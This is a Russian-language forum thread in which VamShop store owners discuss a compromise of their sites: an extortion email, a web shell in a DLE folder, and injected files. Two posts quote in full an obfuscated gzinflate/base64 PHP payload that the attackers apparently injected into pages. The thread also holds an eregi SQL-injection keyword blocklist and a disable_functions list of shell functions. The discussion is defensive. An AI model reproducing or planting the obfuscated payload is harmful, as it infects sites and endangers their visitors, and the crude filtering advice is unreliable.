Появились новые файлы в магазине, откуда?!

[Bomond 2]

Добрый день. Мне третий день ломают интернет-магазин на движке VamShop.

Вот, что прислал взломщик:

keyman keyman keymank@mail.ru

12:46 (8 ч. назад)

кому: мне

Добрый день. нашел у вас на сайте серьезную уязвимость. есть возможность просмотреть структуру сайта и всю информацию из базы данных. не желаете обсудить?

Причем он не шутит, порнуху крутить, скрипты встраивает всплывающие и т.д.

Кто сталкивался с этим дибилом и как решить проблему?

Bomond

Проблема у Вас не в VamShop, а в DLE, который установлен в папке news и в котором загружен shell

Как минимум shell сидит в файле /news/engine/inc/include/referer.init.php

Нужно ОБЯЗАТЕЛЬНО удалить shell из этого файла, а то так и будут ломать постоянно.

Так же нужно ОБЯЗАТЕЛЬНО обновить DLE, в текущей версии наверное закрыты дырки, а лучше вообще его удалить, если не используется DLE.

[-Inna- 0]

в тему сегодня каспер заругался на запрещенный ссылки .

стали разбираться.вот так аккуратно вставлен код

на главную . страницу логина и еще на одну в корне

#9750ce#

echo(gzinflate(base64_decode("XVSLbts2FP0VFxBAcnUVWg8yjqwMQW1jK1wMcIN1hakJik0lDGRKkEhHrut9+y5lowMGmODlOYf3ZV3Oum2rGnN/KNqRd0zxrt7avdSGJKrE3pGcvFWKwiBCyXmQNOkJfUJ3qGtEzz7Cmho0RmtARM9DWFGr9DNAzwC1wMeAMbe3nQT41d21Tz/FAD0CVEmQLGBxh74A2gD6WisHw0mhu3dlUXXyPPYOKUJjT6cbVFshdpTSkFGwhOCxZXNLqRCUxkYzIXzuGE6ppdxIgQKFZ7uDGql097tAQvyZ57d8Ggt0fwPq2U7dE4EOh0S1RZqPtrsavM2FsEBaGl/DgLcFA5+RA/0t5cEQM2YM6Al1tqVyIXlU7aURCOtSCdHDL+BCsEkPiYzZnORzgWSXCmH6qAdm0oNH7izYgx5isn5qg1yaeiyQTUutarw1On84yZZY86BbPx+Z2srHzz/a31Y/9NtfI7n6XMgvlWql+t76XYuJVIWS36v6UZsvz6p9wDlJ8k1yVvkclwJlkBgL+MRtkOKcxf2QLAtauasFaulofKmbLSybXNvLLm01U1YXzxYCDTW3NLoI+NCLmFJfG2Up03AHiqJDB+Nbav/gVKASP3Ee0liWt/E0nG6nwTQuOGVBVPAwotNwJ9B7MiF5cvRVZbo36auXNNpBT4NGoDzpN0qgeS4EzsKet9AlsxXoxTQ3+5s7fW16BA3lgbMWbOlKnLrqbvmFXQRwCPuh8oFdgh3M2YWloArjvlQyXlbdjS0qOfFfImp8SH9fEeWbJO+OlS8racoP6SgSaBQGtElyvxdIdQaoY93UqtPKFKlAT+5/hW4te2al+ZgI5DoVXb+arZVsudfmTbW+NBjjvM6JIn6lcNdA2QWUnex9gutXgbSCj5UkKNt4jd9kGEaQPiAyhpH1Vg77lGHvAOevaWn11qhaY3Iq6xYPoxyOlB55K3KCSTfHRtYw8HAtzEiawuU1OQ2yb+kmG3ulg9QYnoiL5pcP/wzzmDh3a5D8vcmS9czTLu4jmO/T4fX4tllnKfZK8iu+cK8ZXoMb8l9+znrOMLlWAQi5+5+YJJDAO69MzjD34POnMjmfzYvqNki6Z6aoEKAaUPc+eF8xSWY31wfuXw==")));

#/9750ce#

причем сразу на нескольких сайтах вамшопа. версии разные.

отписали хостеру

[YuraS 4]

Вот, что прислал взломщик:

Добрый день. нашел у вас на сайте серьезную уязвимость. есть возможность просмотреть структуру сайта и всю информацию из базы данных. не желаете обсудить?

не пробовали обсудить для начала? перед тем как идти в отдел "К"...

[Bomond 2]

не пробовали обсудить для начала? перед тем как идти в отдел "К"...

а что с ним обсуждать? дать ему 25 баксов, а он потом еще захочет? или что?

[Bomond 2]

Нашел вот такое решение:

Защищаем скрипт от sql-инъекций.

Для защиты вашего скрипта выполните следующее:

1. Откройте файл var.php и удалите строку номер 4, начинающуюся с $n = getenv...

2. На место этой строки вставьте следующий код:

$n = getenv('REQUEST_URI'); if (!eregi('(',$n) and !eregi('(',$n) and !eregi(',',$n) and !eregi('+',$n) and !eregi(':',$n) and !eregi('http',$n) and !eregi('ftp',$n) and !eregi('"',$n) and !eregi("'",$n) and !eregi('<',$n) and !eregi('>',$n) and !eregi('{',$n) and !eregi('}',$n) and !eregi('select',$n) and !eregi('union',$n) and !eregi('null',$n) and !eregi('where',$n) and !eregi('mysql',$n) and !eregi('file',$n) and !eregi('benchmark',$n)) {

но не могу приложить ума, куда в ВамШопе его прикрутить.........

[KoVaLsKy 59]

А хостнг какой?

Вам не кажется что кто то ломит деньги доп-но просто тупо имея доступ к хостингу? ммм..... и не обязательно сами хостеры, а кто то у них тиснул доступы, друзья какие нибудь....

[YuraS 4]

не могу приложить ума, куда в ВамШопе его прикрутить.........

вот именно это и можно было бы обсудить.

[Bomond 2]

Хостинг ХостПро ,вроде надежный, не вариант, чтоб они кому-то сливали инфу hostpro.ua

вот именно это и можно было бы обсудить.

Обсудить с взломщиком куда поставить от него защиту ???? ???? ???? ???? ???? ???? ??? Ты случайно сам таким не занимаешься ???? ???

[YuraS 4]

Обсудить с взломщиком куда поставить от него защиту ???? ???

ну а почему бы и нет? или Вам проще каждый день выгребать кучи дерьма с сервера? ::)

Ты случайно сам таким не занимаешься ????

нет. к сожалению, квалификация не позволяет находить уязвимости в движках.

для того, чтобы что-то Вам посоветовать, надо знать хотя бы, какая версия шопа?

что конкретно он меняет на сервере?

какие файлы меняются?

в логах смотрите, кто куда заходил, с какого айпи, что делал.

или наймите специалиста, который сделает анализ Вашего шопа по этим данным и\или проверит Ваш шоп на уязвимости. и будьте морально готовы к тому, что это может стоить намного дороже, чем 25 уев.

[Bomond 2]

ну, во-первых - куч дерьма с сервера у меня не было, все работало нормально.

версия шопа - последняя - 1.66

он вносил изменния в index.php, account.php, создавал новые файлы в корне и папке admin

он заходит с разных айпи, то Сан-Франциско, то еще что-то, он же не дурак, палиться по айпи

Вот на этом форуме я как раз бы и хотел получит помощь, так как покупал движок за деньги и доступ на форум продливаю постоянно не просто так....

[YuraS 4]

Понимаете ли, то. что Ваш шоп взламывают, совсем не может означать, что так же могут взломать любой другой шоп на этом же движке.

Многое зависит от настроек сервера и от неправильно выставленных прав на папки и файлы.

Может быть, конечно, и в движке уязвимость. На данный момент, со слов разработчика VamShop, все найденные уязвимости пофиксены. Возможно, появилась какая-то новая. Но для того, чтобы ее найти и локализовать, нужны сведения какие-то и человек, который бы смог это проанализировать.

[support 447]

Bomond

т.е. у Вас новые файлы появились в магазине?

А у Вас доступ к лог-файлам есть (access log) и примерная дата когда это всё появилось в магазине?

[Bomond 2]

да, есть доступ. появилдись новые файлы. я их удаляю, они появляются заново. появились пару дней назад. Сейчас буду связываться с хостером, что они скажут.

[support 447]

Ну если есть access log и дата появления файлов, я бы мог посмотреть, как они туда попадают.

Это если у Вас 1.66 версия.

Если какая-то древняя, то смотреть не буду.

[Cyberwolf 0]

У меня было тоже самое, на 1,60, залили папку с варезным сайтом. Вручную удалил все, потом вроде не появлялось. Сейчас переношу на на другой хостинг, решил с нуля все сделать на 1,66, а оказывается на этой версии тоже самое :(

[Bomond 2]

1. Я отключил для сайта .php функции:

disable_functions = show_source, system, shell_exec, passthru, exec, allow_url_fopen

это обеспечило скрипты сайта от запросов на выполнение php-shell скриптов.

2. Удалил хак-файлы

[Cyberwolf 0]

1. Я отключил для сайта .php функции:

disable_functions = show_source, system, shell_exec, passthru, exec, allow_url_fopen

это обеспечило скрипты сайта от запросов на выполнение php-shell скриптов.

2. Удалил хак-файлы

А как это сделать, и какие возможные неудобства может повлечь для управления сайтом.

[Bomond 2]

я писал хостеру, они со своей стороны это сделали, уже третий день после этого работаем спокойно, никаких неудобств или ограничений работы сайта это не повлекло.

[madvolkov 0]

На днях возникла та же проблема на всех сайтах (5 штук vam shop версии 1.65 - 1.66) хостеры разные , во всех файлах .php после каждой строчки "<?php" добавился вышеуказанный вредоносный код, подумал что украли доступы к Ftp. Поменял все доступы и затёр код (по 8000 включений в каждом сайте )) пока что всё в порядке, но раз я не один такой буду подымать логи и смотреть что к чему. Найдёте раньше, было бы неплохо заплатку сваять

[-Inna- 0]

На днях возникла та же проблема на всех сайтах (5 штук vam shop версии 1.65 - 1.66) хостеры разные , во всех файлах .php после каждой строчки "<?php" добавился вышеуказанный вредоносный код, подумал что украли доступы к Ftp. Поменял все доступы и затёр код (по 8000 включений в каждом сайте )) пока что всё в порядке, но раз я не один такой буду подымать логи и смотреть что к чему. Найдёте раньше, было бы неплохо заплатку сваять

Вы про этот код?

#9750ce#

echo(gzinflate(base64_decode("XVSLbts2FP0VFxBAcnUVWg8yjqwMQW1jK1wMcIN1hakJik0lDGRKkEhHrut9+y5lowMGmODlOYf3ZV3Oum2rGnN/KNqRd0zxrt7avdSGJKrE3pGcvFWKwiBCyXmQNOkJfUJ3qGtEzz7Cmho0RmtARM9DWFGr9DNAzwC1wMeAMbe3nQT41d21Tz/FAD0CVEmQLGBxh74A2gD6WisHw0mhu3dlUXXyPPYOKUJjT6cbVFshdpTSkFGwhOCxZXNLqRCUxkYzIXzuGE6ppdxIgQKFZ7uDGql097tAQvyZ57d8Ggt0fwPq2U7dE4EOh0S1RZqPtrsavM2FsEBaGl/DgLcFA5+RA/0t5cEQM2YM6Al1tqVyIXlU7aURCOtSCdHDL+BCsEkPiYzZnORzgWSXCmH6qAdm0oNH7izYgx5isn5qg1yaeiyQTUutarw1On84yZZY86BbPx+Z2srHzz/a31Y/9NtfI7n6XMgvlWql+t76XYuJVIWS36v6UZsvz6p9wDlJ8k1yVvkclwJlkBgL+MRtkOKcxf2QLAtauasFaulofKmbLSybXNvLLm01U1YXzxYCDTW3NLoI+NCLmFJfG2Up03AHiqJDB+Nbav/gVKASP3Ee0liWt/E0nG6nwTQuOGVBVPAwotNwJ9B7MiF5cvRVZbo36auXNNpBT4NGoDzpN0qgeS4EzsKet9AlsxXoxTQ3+5s7fW16BA3lgbMWbOlKnLrqbvmFXQRwCPuh8oFdgh3M2YWloArjvlQyXlbdjS0qOfFfImp8SH9fEeWbJO+OlS8racoP6SgSaBQGtElyvxdIdQaoY93UqtPKFKlAT+5/hW4te2al+ZgI5DoVXb+arZVsudfmTbW+NBjjvM6JIn6lcNdA2QWUnex9gutXgbSCj5UkKNt4jd9kGEaQPiAyhpH1Vg77lGHvAOevaWn11qhaY3Iq6xYPoxyOlB55K3KCSTfHRtYw8HAtzEiawuU1OQ2yb+kmG3ulg9QYnoiL5pcP/wzzmDh3a5D8vcmS9czTLu4jmO/T4fX4tllnKfZK8iu+cK8ZXoMb8l9+znrOMLlWAQi5+5+YJJDAO69MzjD34POnMjmfzYvqNki6Z6aoEKAaUPc+eF8xSWY31wfuXw==")));

#/9750ce#

У меня было по три включения на главной,странице логина и аджеккс

если расшифровать этот код то это ссылка на сайт забугорный. видимо для кражи паролей.

Есть подозрения что дыра не закрыта.Важно найти откуда ломали. у меня тоже нет постороннего доступа по фтп. а проблемы есть. Если у Вас сразу на нескольких хостингах такое то нужно серьезно искать причину. два месяца назад. внедрялся совсем другой код. ведущий на китайский сайт

[KoVaLsKy 59]

Товарищи, у кого наблюдается проблема, у Вас у самих антивирус хороший стоит.... недели две назад наткнулся на вирусик, он искал текстовые документы и файлы в которых были ключи "FTP, admin, login", искал данные filezilla и тотал командера. как точно не знаю но нашел готовые для отправки (а может и отправленные файлы со всеми данными) и т.д он формировал файлы и отправлял их китайцам. множился не сам. снес его каспером, был он не у меня, но чудил этот вирь хорошо. так вот попади он ко мне, у меня порядка 100 доступов к сайтам и файловых им системам.

Ну и последнее, пароли, доступы и т.д ведь почти всегда все равно отдаем заказчикам, а они совсем, порой не понимают ничего в защите компьютера....

так что я стал аставлять не на компе все хранить а на бумажку писать ::)

[-Inna- 0]

пароль просто не сохраняй.поработал с менеджером. пароль удалил.

тут дело не фтп. доступа по фтп чужого нет. взлом есть

[KoVaLsKy 59]

нет нет я понял. это так к слову...

[Cyberwolf 0]

Товарищи, у кого наблюдается проблема, у Вас у самих антивирус хороший стоит.... недели две назад наткнулся на вирусик, он искал текстовые документы и файлы в которых были ключи "FTP, admin, login", искал данные filezilla и тотал командера. как точно не знаю но нашел готовые для отправки (а может и отправленные файлы со всеми данными) и т.д он формировал файлы и отправлял их китайцам. множился не сам. снес его каспером, был он не у меня, но чудил этот вирь хорошо. так вот попади он ко мне, у меня порядка 100 доступов к сайтам и файловых им системам.

Ну и последнее, пароли, доступы и т.д ведь почти всегда все равно отдаем заказчикам, а они совсем, порой не понимают ничего в защите компьютера....

так что я стал аставлять не на компе все хранить а на бумажку писать ::)

я фтп не пользовался, клиентов у меня нет, взлом был :(

[Cyberwolf 0]

http://ru-anticms.livejournal.com/24422.html

может быть это ?